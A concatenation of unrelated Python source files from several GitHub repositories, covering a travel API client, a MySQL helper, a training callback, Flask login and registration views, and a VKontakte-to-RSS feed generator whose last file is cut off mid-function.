#### File: travelpayouts-python/travelpayouts/common.py
```python
BASE_URL = 'http://www.travelpayouts.com'
API_DATA_URL = 'http://api.travelpayouts.com/data'
def whereami(client, ip, locale='en', callback=None):
locale = locale if locale in ['en', 'ru', 'de', 'fr', 'it', 'pl', 'th'] else 'en'
params = {
'ip': ip,
'locale': locale
}
if callback:
params["callback"] = callback
return client._get(BASE_URL+"/whereami", params)
def countries(client):
"""Returns a file with a list of countries from the database.
:rtype: list of countries
"""
data = client._get(API_DATA_URL+"/countries.json")
return data
def cities(client):
"""Returns a file with a list of cities from the database.
:rtype: list of cities
"""
data = client._get(API_DATA_URL+"/cities.json")
return data
def airports(client):
"""Returns a file with a list of airports from the database.
:rtype: list of airports
"""
data = client._get(API_DATA_URL+"/airports.json")
return data
def airlines(client):
"""Returns a file with a list of airlines from the database.
:rtype: list of airports
"""
data = client._get(API_DATA_URL+"/airlines.json")
return data
def airlines_alliances(client):
"""Returns a file with a list of alliances from the database.
:rtype: list of alliances
"""
data = client._get(API_DATA_URL+"/airlines_alliances.json")
return data
def planes(client):
"""Returns a file with a list of airplanes from the database.
:rtype: list of airplanes
"""
data = client._get(API_DATA_URL+"/planes.json")
return data
def routes(client):
"""Returns a file with a list of routes from the database.
:rtype: list of routes
"""
data = client._get(API_DATA_URL+"/routes.json")
return data
```
#### File: travelpayouts-python/travelpayouts/v1.py
```python
import travelpayouts.exceptions
API_V1_URL = 'http://api.travelpayouts.com/v1'
def prices_cheap(client):
pass
def prices_direct(client):
pass
def prices_calendar(client):
pass
def airline_directions(client):
pass
def city_directions(client):
pass
``` |
{
"source": "Joker-Jerome/consistency-checks",
"score": 3
} |
#### File: consistency-checks/db/mysql.py
```python
import pymysql
from contextlib import contextmanager
@contextmanager
def mysql_db_connection(cursor_factory=None):
try:
from config import db_config
db = db_config()
con = pymysql.connect(user=db['user'],
db=db['database'],
host=db['host'],
password=db['password'] if db['password'] is not None else '',
port=int(db['port']),
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
if cursor_factory is not None:
cur = con.cursor(cursor=cursor_factory)
else:
cur = con.cursor()
except pymysql.Error as err:
yield None, None, err
else:
try:
yield con, cur, None
finally:
cur.close()
con.close()
def execute_mysql_query(query: str) -> float:
with mysql_db_connection() as (_, cursor, _):
cursor.execute(query)
result = cursor.fetchone()
return float(list(result.values())[0])
``` |
{
"source": "Joker-L0912/Tms-GCN-Py",
"score": 2
} |
#### File: callbacks/base/best_epoch.py
```python
import copy
import numpy as np
import torch
from pytorch_lightning.utilities import rank_zero_warn
from pytorch_lightning.callbacks import Callback
class BestEpochCallback(Callback):
TORCH_INF = torch_inf = torch.tensor(np.Inf)
MODE_DICT = {
"min": (torch_inf, "min"),
"max": (-torch_inf, "max"),
# "max": (100, "max"),
}
MONITOR_OP_DICT = {"min": torch.lt, "max": torch.gt}
def __init__(self, monitor="", mode="min"):
super(BestEpochCallback, self).__init__()
self.monitor = monitor
self.__init_monitor_mode(monitor, mode)
self.best_epoch = 0
def __init_monitor_mode(self, monitor, mode):
if mode not in self.MODE_DICT and mode != "auto":
rank_zero_warn(
f"PrintBestEpochMetrics mode {mode} is unknown, fallback to auto mode",
RuntimeWarning,
)
mode = "auto"
if mode == "auto":
rank_zero_warn(
"mode='auto' is deprecated in v1.1 and will be removed in v1.3."
" Default value for mode with be 'min' in v1.3.",
DeprecationWarning,
)
self.MODE_DICT["auto"] = (
(-self.TORCH_INF, "max")
if monitor is not None and ("acc" in monitor or monitor.startswith("fmeasure"))
else (self.TORCH_INF, "min")
)
self.best_value, self.mode = self.MODE_DICT[mode]
def on_validation_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):
if (trainer.current_epoch + 1) % trainer.check_val_every_n_epoch != 0:
return
monitor_op = self.MONITOR_OP_DICT[self.mode]
metrics_dict = copy.copy(trainer.callback_metrics)
monitor_value = metrics_dict.get(self.monitor, self.best_value)
if monitor_op(monitor_value.type_as(self.best_value), self.best_value):
self.best_value = monitor_value
self.best_epoch = trainer.current_epoch
``` |
{
"source": "jokerLiz/flask_news_info",
"score": 2
} |
#### File: modules/passport/views.py
```python
from . import passport_blue
from flask import request, jsonify, current_app, make_response, json, session
from newsInfo.utils.response_code import RET #返回 response响应使用的模板
from newsInfo.utils.captcha.captcha import captcha #导入图片验证码工具包
from ... import redis_store, constants
import random
import re
from newsInfo.libs.yuntongxun.sms import CCP #导入云通讯依赖包中的CCP
from newsInfo.models import User #用户表
from newsInfo import db #数据库对象db
from datetime import datetime
'''图片验证码'''
#功能描述: 图片验证码
#请求地址: /passport/image_code?cur_id=xxx&pre_id=xxx
#请求方式: GET
#请求参数: 随机字符串(uuid)cur_id, 上一个字符串:pre_id
#返回值: 返回图片
@passport_blue.route('/image_code')
def get_image_code():
'''
思路:
1.获取参数
2.校验参数,查看参数的存在性
3.利用captcha工具获取验证码信息
4.保存到redis中
5.返回验证码图片信息
:return:
'''
#1.获取url中?后的参数,也就是get方式访问携带的参数
cur_id = request.args.get('cur_id')
pre_id = request.args.get('pre_id')
#2.校验参数
if not cur_id:
return jsonify(errno = RET.PARAMERR,errmsg='参数不全')
#3.生成图片验证码
try:
#获取图片信息
name,text,image_data = captcha.generate_captcha()
#保存到redis中
'''
参数1:保存到redis的key---图片id
参数2:key对应的value-- 图片验证码的text文本
参数3:过期时间
'''
redis_store.set('image_code:%s'%cur_id,text,constants.IMAGE_CODE_REDIS_EXPIRES)
#判断有没有上一个图片的编号
if pre_id:
#释放该编号的验证码信息
redis_store.delete('image_code:%s'%pre_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno = RET.DBERR,errmsg='验证码操作失败')
#返回验证码图片信息
response = make_response(image_data) #16进制信息
#把回应头改为image格式
response.headers['Content-Type'] = 'image/jpg'
return response
'''短信验证码'''
# 功能描述:发送短信
# 请求路径:/passport/sms_code
# 请求方式: POST
# 请求参数:mobile,image_code,image_code_id
# 参数格式:Json
# 返回值:errno,errmsg
@passport_blue.route('/sms_code',methods=['POST'])
def get_sms_code():
'''
思路分析:
1. 获取参数
2.校验参数,为空校验和格式校验
3.取出redis中的图片验证码
4.判断图片验证码是否过期
5.如果过期,删除该验证码信息
6.图片验证码的正确性判断
7.生成短信验证码
8.发送短信
9.判断是否发送成功
10.保存短信验证码到redis
11.返回响应
:return:
'''
#1. 获取参数
json_data = request.data
dict_data = json.loads(json_data) #将json格式转化为字典
mobile = dict_data.get('mobile') #获取前端传来的三个参数
image_code = dict_data.get('image_code')
image_code_id = dict_data.get('image_code_id')
# 2.校验参数
if not all([mobile,image_code,image_code_id]): #如果参数不全
return jsonify(errno=RET.PARAMERR,errmsg='参数不足')
if not re.match('1[3579]\d{9}',mobile): #如果手机号码不合法
return jsonify(errno=RET.PARAMERR,errmsg='手机格式不正确')
# 3.取出redis中的图片验证码信息
try:
redis_image_code = redis_store.get('image_code:%s'%image_code_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR,errmsg='数据获取失败')
# 4.判断上一步获取的图片验证码信息是否过期
if not redis_image_code:
return jsonify(errno=RET.NODATA, errmsg="图片验证码过期")
# 5.如果过期,删除redis中图片验证码
try:
redis_store.delete('image_code:%s'%image_code_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="删除图片验证码失败")
# 6.图片验证码正确性判断
if image_code.upper() != redis_image_code.upper():
return jsonify(errno=RET.DATAERR,errmsg='图片验证码错误')
# 7.生成验证码
sms_code = '%06d'%random.randint(0,999999)
current_app.logger.debug(f'短信验证码:{sms_code}')
# 8.发送验证码短信
try:
ccp = CCP()
# 注意: 测试的短信模板编号为1
# 参数1: 发送给谁的手机号
# 参数2: ['内容', 有效时间单位分钟]
# 参数3: 模板编号1 【云通讯】您使用的是云通讯短信模板,您的验证码是{1},请于{2}分钟内正确输入
result = ccp.send_template_sms(mobile, [sms_code, constants.SMS_CODE_REDIS_EXPIRES/60], 1)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.THIRDERR, errmsg="云通讯发送失败")
# 9.判断验证码发送成功
if result == -1:
return jsonify(errno=RET.DATAERR , errmsg="发送短信失败")
# 10.保存验证码到redis
try:
redis_store.set('sms_code:%s'%mobile,sms_code,constants.SMS_CODE_REDIS_EXPIRES)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="短信保存失败")
# 11.返回响应
return jsonify(errno=RET.OK,errmsg='发送成功')
'''注册功能的实现'''
# 功能描述:注册
# 请求路径:/passport/register
# 请求方式: POST
# 请求参数:mobile,sms_code,password
# 参数格式:Json
# 返回值:errno,errmsg
@passport_blue.route('/register',methods=['POST'])
def register():
'''
1. 获取参数
2. 校验参数
3. 通过手机号在redis取出验证码
4. 判断短信验证码是否过期
5. 删除redis中的短信验证码
6. 判断验证码的正确性
7. 创建用户对象
8. 设置用户属性
9. 保存到数据库
10.返回成功响应
:return:
'''
# 1.获取参数
# json_data = request.data
# dict_data = json.loads(json_data) # 将json格式转化为字典
#上边两句等于下面一句
dict_data = request.json
mobile = dict_data.get('mobile')
sms_code = dict_data.get('sms_code')
password = <PASSWORD>('password')
# 2.校验参数
if not all([mobile,sms_code,password]):
return jsonify(errno=RET.PARAMERR,errmsg='参数不全')
# 3.通过手机号在redis取出验证码
try:
redis_sms_code = redis_store.get('sms_code:%s' % mobile)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg='数据获取失败')
# 4.判断短信验证码是否过期
if not redis_sms_code:
return jsonify(errno=RET.NODATA, errmsg='验证码过期')
# 5. 删除redis中的短信验证码
try:
redis_store.delete('sms_code:%s' % mobile)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg='删除短信验证码错误')
# 6.判断验证码的正确性
if sms_code != redis_sms_code:
return jsonify(errno=RET.DATAERR, errmsg='验证码错误')
'''
7. 创建用户对象
8. 设置用户属性
9. 保存到数据库
10.返回成功响应
'''
# 7.创建用户对象
user = User()
#8.设置用户属性
user.nick_name = mobile
user.password = password
user.mobile = mobile
#9.保存到数据库
try:
db.session.add(user)
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg='提交数据库错误')
#9.返回成功响应
return jsonify(errno=RET.OK,errmsg='注册成功')
'''登录功能的实现'''
# 1.获取参数
# 2.校验
# 3.通过手机号获取对象
# 4. 判断用户是否存在
# 5.判断密码
# 6. 保存用户信息到session中
# 7. 返回响应
@passport_blue.route('/login',methods=['POST'])
def login():
'''
1.获取参数
2. 校验参数
3. 通过手机号获取对象
4. 判断用户是否存在
5. 判断密码是否正确
6. 保存用户到session中
7. 返回响应
:return:
'''
#1.获取参数
mobile = request.json.get('mobile')
password = request.json.get('password')
#2. 校验参数
if not all([mobile,password]):
return jsonify(errno=RET.NODATA,errmsg='参数不足')
if not re.match('1[3579]\d{9}',mobile): #如果手机号码不合法
return jsonify(errno=RET.PARAMERR,errmsg='手机格式不正确')
# 3.通过手机号取出对象
try:
user = User.query.filter_by(mobile=mobile).first()
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg='查询用户失败')
# 4.判断用户是否存在
if not user:
return jsonify(errno=RET.NODATA, errmsg='该用户未注册')
# 5.判断密码是否正确
if not user.check_passowrd(password):
return jsonify(errno=RET.DATAERR, errmsg='密码错误')
# 6.保存用户到session中
session['user_id'] = user.id
session['mobile'] = mobile
session['nick_name'] = user.nick_name
user.last_login = datetime.now()
#7.返回响应
current_app.logger.debug('登陆成功') #生成日志
return jsonify(errno=RET.OK, errmsg='登录成功')
'''退出'''
@passport_blue.route('/logout',methods=['POST'])
def logout():
# 清除session中的信息
session.pop('user_id',None)
session.pop('mobile', None)
session.pop('nick_name', None)
return jsonify(errno=RET.OK,errmsg='OK')
```
#### File: newsInfo/utils/common.py
```python
def do_index_class(index):
if index ==1:
return 'first'
elif index == 2:
return 'second'
elif index == 3:
return 'third'
``` |
{
"source": "JOKERMAX89/vkfeed",
"score": 2
} |
#### File: vkfeed/PyRSS2Gen/setup.py
```python
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
import PyRSS2Gen
from distutils.core import setup
setup(name = "PyRSS2Gen",
version = ".".join(map(str, PyRSS2Gen.__version__)),
url ='http://www.dalkescientific.com/Python/PyRSS2Gen.html',
license = 'BSD',
description = 'A Python library for generating RSS 2.0 feeds.',
long_description = read('README'),
author = '<NAME>',
author_email = '<EMAIL>',
maintainer_email = '<EMAIL>',
packages = find_packages('.'),
package_dir = {'':'.'},
install_requires = ['setuptools'],
classifiers = [
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python :: 2.3',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
],
py_modules = ['PyRSS2Gen', 'test', 'example']
)
```
#### File: vkfeed/pages/wall.py
```python
from __future__ import unicode_literals
import cgi
import datetime
import httplib
import logging
import time
import webapp2
from PyRSS2Gen import PyRSS2Gen
from vkfeed import constants
from vkfeed.core import Error
import vkfeed.utils
LOG = logging.getLogger(__name__)
class WallPage(webapp2.RequestHandler):
'''Generates an RSS feed.'''
def get(self, profile_name):
'''Processes the request.
We don't use VKontakte API because it requires authorization and gives
tokens with expiration time which is not suitable for RSS generator.
'''
headers = self.__get_headers()
user_agent = headers.get('user-agent', '').strip()
if user_agent and (
# Google Reader bot still crawls the Web. Reject it to save
# bandwidth.
user_agent.startswith('Feedfetcher-Google;') or
# FeedNotifier updates feeds every minute
user_agent.startswith('FeedNotifier/') or
# YandexBlogs bot sends a lot of requests (2/minute) for some
# feeds. The support doesn't respond adequately.
'YandexBlogs' in user_agent
):
self.error(httplib.FORBIDDEN)
return
user_error = None
http_status = httplib.OK
unknown_user_error = False
try:
show_photo = ( self.request.get('show_photo', '1') != '0' )
foreign_posts = ( self.request.get('foreign_posts', '0') != '0' )
hash_tag_title = ( self.request.get('hash_tag_title', '0') != '0' )
text_title = ( self.request.get('text_title', '0') != '0' )
big_photos = ( self.request.get('big_photos', '0') != '0' )
LOG.info('Requested feed for "%s" (foreign_posts = %s, show_photo = %s, hash_tag_title = %s, text_title = %s, big_photos = %s).',
profile_name, foreign_posts, show_photo, hash_tag_title, text_title, big_photos)
use_api = True
if_modified_since = None
if use_api:
# Use VKontakte API
from vkfeed.tools import wall_reader
max_posts_num = 50
cur_time = int(time.time())
latency = constants.MINUTE_SECONDS
min_timestamp = cur_time - constants.WEEK_SECONDS
## This confuses Google Reader users because it always requests
## feeds with 'Cache-Control: max-age=3600' when adding
## subscriptions and users often gen an empty feed.
#for cache_control in headers.get('cache-control', '').split(','):
# cache_control = cache_control.strip()
# if cache_control.startswith('max-age='):
# LOG.info('Applying Cache-Control: %s...', cache_control)
# try:
# cache_max_age = int(cache_control[len('max-age='):])
# except ValueError:
# LOG.error('Invalid header: Cache-Control = %s.', cache_control)
# else:
# if cache_max_age:
# min_timestamp = max(min_timestamp, cur_time - cache_max_age - latency)
if 'if-modified-since' in headers and headers['if-modified-since'] != '0':
LOG.info('Applying If-Modified-Since: %s...', headers['if-modified-since'])
try:
if_modified_since = vkfeed.utils.http_timestamp(headers['if-modified-since'])
except Exception as e:
LOG.error('Invalid header: If-Modified-Since = %s.', headers['if-modified-since'])
else:
min_timestamp = max(min_timestamp, if_modified_since - latency)
max_age = cur_time - min_timestamp
LOG.info('Applying the following limits: max_age=%s, max_posts_num=%s', max_age, max_posts_num)
try:
data = wall_reader.read(profile_name,
min_timestamp, max_posts_num, foreign_posts, show_photo,
hash_tag_title, text_title, big_photos)
except wall_reader.ConnectionError as e:
http_status = httplib.BAD_GATEWAY
user_error = 'Ошибка соединения с сервером <a href="{0}" target="_blank">{0}</a>.'.format(constants.API_URL)
raise
except wall_reader.ServerError as e:
http_status = httplib.NOT_FOUND
user_error = unicode(e)
raise
else:
# Parse HTML from site
from vkfeed.tools.wall_parser import WallPageParser, ParseError, PrivateGroupError, ProfileNotAvailableError, ServerError
url = constants.VK_URL + cgi.escape(profile_name)
url_html = '<a href="{0}" target="_blank">{0}</a>'.format(url)
if profile_name == 'feed':
http_status = httplib.NOT_FOUND
user_error = 'Страница {0} не является профилем пользователя или группы.'.format(url_html)
raise Error('Unsupported page.')
try:
profile_page = vkfeed.utils.fetch_url(url)
except vkfeed.utils.HTTPNotFoundError:
http_status = httplib.NOT_FOUND
user_error = 'Пользователя или группы {0} не существует.'.format(url_html)
raise
except Error:
http_status = httplib.BAD_GATEWAY
user_error = 'Не удалось загрузить страницу {0}.'.format(url_html)
unknown_user_error = True
raise
try:
data = WallPageParser().parse(profile_page)
except PrivateGroupError as e:
http_status = httplib.NOT_FOUND
user_error = 'Группа {0} является закрытой группой.'.format(url_html)
raise
except ProfileNotAvailableError as e:
http_status = httplib.NOT_FOUND
user_error = 'Страница пользователя {0} удалена или доступна только авторизованным пользователям.'.format(url_html)
raise
except ServerError as e:
LOG.debug('Page contents:\n%s', profile_page)
http_status = httplib.BAD_GATEWAY
user_error = 'Сервер {0} вернул ошибку{1}'.format(url_html, ':<br />' + e.server_error if e.server_error else '.')
unknown_user_error = True
raise
except ParseError as e:
LOG.debug('Page contents:\n%s', profile_page)
http_status = httplib.NOT_FOUND
user_error = 'Сервер вернул страницу, на которой не удалось найти стену с сообщениями пользователя.'
unknown_user_error = True
raise
data['url'] = url
if 'user_photo' not in data:
data['user_photo'] = constants.APP_URL + 'images/vk-rss-logo.png'
LOG.info('Return %s items.', len(data['posts']))
if if_modified_since is not None and not data['posts']:
http_status = httplib.NOT_MODIFIED
else:
feed = self.__generate_feed(data)
except Exception as e:
if isinstance(e, Error):
if user_error and not unknown_user_error:
log_function = LOG.warning
else:
log_function = LOG.error
else:
log_function = LOG.exception
log_function('Unable to generate a feed for "%s": %s', profile_name, e)
if user_error:
self.error(http_status)
error = '<p>Ошибка при генерации RSS-ленты:</p><p>{0}</p>'.format(user_error)
if unknown_user_error:
error += '''<p>
Пожалуйста, убедитесь, что вы правильно указали профиль
пользователя или группы, и что данный профиль является
общедоступным.
</p>'''
else:
self.error(httplib.INTERNAL_SERVER_ERROR)
error = '''При генерации RSS-ленты произошла внутренняя ошибка сервера.'''
self.response.headers[b'Content-Type'] = b'text/html; charset=utf-8'
self.response.out.write(vkfeed.utils.render_template('error.html', { 'error': error }))
else:
if http_status == httplib.OK:
self.response.headers[b'Content-Type'] = b'application/rss+xml'
self.response.out.write(feed)
else:
self.error(http_status)
def __generate_feed(self, data):
'''Generates a feed from a parsed data.'''
rss = PyRSS2Gen.RSS2(
title = data['user_name'],
link = data['url'],
description = 'Сообщения со стены пользователя ' + data['user_name'],
image = PyRSS2Gen.Image(
url = data['user_photo'],
title = data['user_name'],
link = data['url'],
description = 'Сообщения со стены пользователя ' + data['user_name']
),
items = [
PyRSS2Gen.RSSItem(
title = post['title'],
link = post['url'],
description = post['text'],
guid = PyRSS2Gen.Guid(post['url']),
pubDate = post.get('date', datetime.datetime.utcnow())
) for post in data['posts']
]
)
return rss.to_xml('utf-8')
def __get_headers(self):
'''Returns lowercased headers.'''
return { name.lower(): value for name, value in self.request.headers.iteritems() }
```
#### File: vkfeed/tools/wall_reader.py
```python
from __future__ import unicode_literals
import json
import datetime
import logging
import re
import urllib
from google.appengine.api import memcache
import vkfeed.utils
from vkfeed import constants
from vkfeed.core import Error
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
_TEXT_URL_RE = re.compile(r'(^|\s|>)(https?://[^"]+?)(\.?(?:<|\s|$))')
'''Matches a URL in a plain text.'''
_DOMAIN_ONLY_TEXT_URL_RE = re.compile(r'(^|\s|>)((?:[a-z0-9](?:[-a-z0-9]*[a-z0-9])?\.)+[a-z0-9](?:[-a-z0-9]*[a-z0-9])/[^"]+?)(\.?(?:<|\s|$))')
'''Matches a URL without protocol specification in a plain text.'''
_NEW_LINE_RE = re.compile(r'<br(?:\s*/)?>', re.IGNORECASE)
'''Matches a user link in a post text.'''
_USER_LINK_RE = re.compile(r'\[((?:id|club)\d+)\|([^\]]+)\]')
'''Matches a user link in a post text.'''
_GROUP_ALIAS_RE = re.compile(r'^(?:event|public)(\d+)$')
'''Matches group ID aliases.'''
_HASH_TAG_RE = re.compile(ur'#[a-zA-Zа-яА-Я0-9\-_]+')
'''Matches a hash tag.'''
class ConnectionError(Error):
'''Raised when we fail to get a data from the server.'''
def __init__(self, *args, **kwargs):
Error.__init__(self, *args, **kwargs)
class ServerError(Error):
'''Raised when the server reports an error.'''
def __init__(self, code, *args, **kwargs):
Error.__init__(self, *args, **kwargs)
self.code = code
def read(profile_name, min_timestamp, max_posts_num, foreign_posts, show_photo, hash_tag_title, text_title, big_photos):
'''Reads a wall of the specified user.'''
users = {}
wall_posts = []
user = _get_user(profile_name)
def get_wall(prediction):
LOG.info('Predicted to %s.', prediction)
_get_wall(user, foreign_posts, len(wall_posts), prediction - len(wall_posts), users, wall_posts)
if len(wall_posts) < max_posts_num and len(wall_posts) == prediction and wall_posts[-1]['date'] > min_timestamp:
LOG.warning('Got invalid prediction %s.', prediction)
get_wall(min(max(prediction, 5) * 2, max_posts_num))
wall_request_fingerprint = '{0}|{1}|{2}'.format(user['id'], int(foreign_posts), max_posts_num)
last_post_num = memcache.get(wall_request_fingerprint, 'post_stat')
if last_post_num is None:
LOG.info('There is no statistics on previous number of posts.')
get_wall(10 if max_posts_num > 10 else max_posts_num)
else:
LOG.info('Previously returned number of posts: %s.', last_post_num)
get_wall(min(max_posts_num, last_post_num + 2))
wall_posts = wall_posts[:max_posts_num]
img_style = 'style="border-style: none; display: block;"'
posts = []
for post in wall_posts:
if post['date'] < min_timestamp:
continue
supported = []
unsupported = []
title = _get_post_title(users, post, text_title, hash_tag_title)
if 'attachment' in post and post['text'] == post['attachment'][post['attachment']['type']].get('title'):
post['text'] = ''
photo_count = reduce(
lambda count, attachment:
count + ( attachment['type'] in ( 'photo', 'posted_photo' ) ),
post.get('attachments', []), 0)
for attachment in post.get('attachments', []):
# Notice: attachment object is not always stored in
# attachment[attachment["type"]] - sometimes it's stored under a
# different key, so we can't obtain it here for all attachment types.
if attachment['type'] == 'app':
supported.append(
'<a href="{vk_url}app{info[app_id]}"><img {img_style} src="{info[src]}" /></a>'.format(
vk_url = constants.VK_URL, info = attachment[attachment['type']], img_style = img_style))
elif attachment['type'] == 'graffiti':
supported.append(
'<a href="{vk_url}graffiti{info[gid]}"><img {img_style} src="{info[src]}" /></a>'.format(
vk_url = constants.VK_URL, info = attachment[attachment['type']], img_style = img_style))
elif attachment['type'] == 'link':
info = attachment[attachment['type']]
info['description'] = _parse_text(info['description']) or info['title']
html = '<b>Ссылка: <a href="{info[url]}">{info[title]}</a></b><p>'.format(info = info)
if info.get('image_src') and info['description']:
html += (
'<table cellpadding="0" cellspacing="0"><tr valign="top">'
'<td><a href="{info[url]}"><img {img_style} src="{info[image_src]}" /></a></td>'
'<td style="padding-left: 10px;">{info[description]}</td>'
'</tr></table>'.format(info = info, img_style = img_style))
elif info.get('image_src'):
html += '<a href="{info[url]}"><img {img_style} src="{info[image_src]}" /></a>'.format(
info = info, img_style = img_style)
elif info['description']:
html += info['description']
html += '</p>'
supported.append(html)
elif attachment['type'] in ('photo', 'posted_photo'):
info = attachment[attachment['type']]
photo_id = info.get('pid', info.get('id', 0))
photo_src = info['src_big'] if photo_count == 1 or big_photos else info['src']
# Photo may have id = 0 and owner_id = 0 if it for example
# generated by an application.
if photo_id == 0 or info['owner_id'] == 0:
supported.append(
'<a href="{vk_url}wall{profile_id}_{post_id}"><img {img_style} src="{photo_src}" /></a>'.format(
vk_url = constants.VK_URL, profile_id = user['id'], post_id = post['id'],
img_style = img_style, photo_src = photo_src))
else:
supported.append(
'<a href="{vk_url}wall{profile_id}_{post_id}?z=photo{info[owner_id]}_{photo_id}%2Fwall{profile_id}_{post_id}">'
'<img {img_style} src="{photo_src}" /></a>'.format(
vk_url = constants.VK_URL, profile_id = user['id'], photo_id = photo_id,
info = info, post_id = post['id'], img_style = img_style, photo_src = photo_src))
elif attachment['type'] == 'video':
info = attachment[attachment['type']]
supported.append(
'<a href="{vk_url}wall{profile_id}_{post_id}?z=video{info[owner_id]}_{info[vid]}">'
'<img {img_style} src="{info[image]}" />'
'<b>{info[title]} ({duration})</b>'
'</a>'.format(
vk_url = constants.VK_URL, profile_id = user['id'], post_id = post['id'], info = info,
img_style = img_style, duration = _get_duration(info['duration'])))
elif attachment['type'] == 'audio':
info = attachment[attachment['type']]
unsupported.append('<b>Аудиозапись: <a href="{vk_url}search?{query}">{title}</a></b>'.format(
vk_url = constants.VK_URL, query = urllib.urlencode({
'c[q]': (info['performer'] + ' - ' + info['title']).encode('utf-8'),
'c[section]': 'audio'
}), title = '{} - {} ({})'.format(info['performer'], info['title'], _get_duration(info['duration']))))
elif attachment['type'] == 'doc':
unsupported.append('<b>Документ: {}</b>'.format(attachment[attachment['type']]['title']))
elif attachment['type'] == 'note':
unsupported.append('<b>Заметка: {}</b>'.format(attachment[attachment['type']]['title']))
elif attachment['type'] == 'page':
unsupported.append('<b>Страница: {}</b>'.format(attachment[attachment['type']]['title']))
elif attachment['type'] == 'poll':
unsupported.append('<b>Опрос: {}</b>'.format(attachment[attachment['type']]['question']))
text = ''
if supported:
text += '<p>' + '</p><p>'.join(supported) + '</p>'
text += _parse_text(post['text'])
if unsupported:
text += '<p>' + '</p><p>'.join(unsupported) + '</p>'
if 'copy_owner_id' in post and 'copy_post_id' in post:
text = '<p><b><a href="{profile_url}">{user_name}</a></b> пишет:</p>'.format(
profile_url = _get_profile_url(post['copy_owner_id']), user_name = users[post['copy_owner_id']]['name']) + text
if 'copy_text' in post:
text = '<p>{}</p><div style="margin-left: 1em;">{}</div>'.format(post['copy_text'], text)
if 'reply_owner_id' in post and 'reply_post_id' in post:
text += (
'<p><i>'
'В ответ на <a href="{vk_url}wall{post[reply_owner_id]}_{post[reply_post_id]}">запись</a> '
'пользователя <b><a href="{profile_url}">{user_name}</a></b>.'
'</i></p>'.format(vk_url = constants.VK_URL, post = post,
profile_url = _get_profile_url(post['reply_owner_id']), user_name = users[post['reply_owner_id']]['name']))
if show_photo:
text = (
'<table cellpadding="0" cellspacing="0"><tr valign="top">'
'<td><a href="{url}"><img {img_style} src="{photo}" /></a></td>'
'<td style="padding-left: 10px;">{text}</td>'
'</tr></table>'.format(
url = _get_profile_url(post['from_id']), img_style = img_style,
photo = users[post['from_id']]['photo'], text = text))
date = (
datetime.datetime.fromtimestamp(post['date'])
# Take MSK timezone into account
+ datetime.timedelta(hours = 4))
posts.append({
'title': title,
'url': '{0}wall{1}_{2}'.format(constants.VK_URL, user['id'], post['id']),
'text': text,
'date': date,
})
if last_post_num != len(posts):
memcache.set(wall_request_fingerprint, len(posts), namespace = 'post_stat')
return {
'url': constants.VK_URL + profile_name,
'user_name': user['name'],
'user_photo': user['photo'],
'posts': posts,
}
def _api(method, **kwargs):
'''Calls the specified VKontakte API method.'''
url = '{0}method/{1}?language=0&'.format(constants.API_URL, method) + urllib.urlencode(kwargs)
try:
data = vkfeed.utils.fetch_url(url, content_type = 'application/json')
try:
data = json.loads(data)
except Exception as e:
raise Error('Failed to parse JSON data: {0}.', e)
except Exception as e:
raise ConnectionError('API call {0} failed: {1}', url, e)
if 'error' in data or 'response' not in data:
error = data.get('error', {}).get('error_msg', '').strip()
if not error:
error = 'Ошибка вызова API.'
elif error == 'Access denied: group is blocked':
error = (
'Страница временно заблокирована и проверяется администраторами, '
'так как некоторые пользователи считают, что она не соответствует правилам сайта.')
elif error == 'Access denied: this wall available only for community members':
error = 'Это частное сообщество. Доступ только по приглашениям администраторов.'
elif error == 'User was deleted or banned':
error = 'Пользователь удален или забанен.'
elif not error.endswith('.'):
error += '.'
raise ServerError(data.get('error', {}).get('error_code'), error)
return data['response']
def _get_duration(seconds):
'''Returns audio/video duration string.'''
hours = seconds / 60 / 60
minutes = seconds / 60 % 60
seconds = seconds % 60
if hours:
return '{:02d}:{:02d}:{:02d}'.format(hours, minutes, seconds)
else:
return '{:02d}:{:02d}'.format(minutes, seconds)
def _get_post_title(users, post, text_title, hash_tag_title):
'''Formats title for a post.'''
title = users[post['from_id']]['name']
if text_title:
text = post['text'].lstrip('.?!')
text = _NEW_LINE_RE.sub(' ', text).strip()
if text:
title = _USER_LINK_RE.sub(r'\2', text)
limit_pos = len(title)
pos = title.find('.')
if pos != -1:
limit_pos = min(limit_pos, pos)
if title[limit_pos : limit_pos + 3] == '...':
limit_pos += 3
pos = title.find('?')
if pos != -1:
limit_pos = min(limit_pos, pos + 1)
pos = title.find('!')
if pos != -1:
limit_pos = min(limit_pos, pos + 1)
title = title[:limit_pos]
elif hash_tag_title:
hash_tags = _HASH_TAG_RE.findall(post['text'])
if hash_tags:
title = ', '.join(
tag[1:].lower() if id else tag[1:].title()
for id, tag in enumerate(hash_tags))
return title
def _get_profile_url(profile_id):
'''Returns URL to profile with the specified ID.'''
return constants.VK_URL + ( 'club' if profile_id < 0 else 'id' ) + str(abs(profile_id))
def _get_user(profile_name):
'''Returns user info by profile name.'''
user = memcache.get(profile_name, 'users')
if user is not None:
LOG.info('Got the profile info from memcache.')
if not user:
raise ServerError(113, 'Пользователя не существует.')
return user
try:
profiles = _api('users.get', uids = profile_name, fields = 'photo_big,photo_medium,photo')
if not profiles:
raise ServerError(-1, 'Пользователь заблокирован.')
profile = profiles[0]
user = {
'id': profile['uid'],
'name': profile['first_name'] + ' ' + profile['last_name'],
}
except ServerError as e:
# Invalid user ID
if e.code == 113:
try:
# VKontakte API doesn't understand group ID aliases
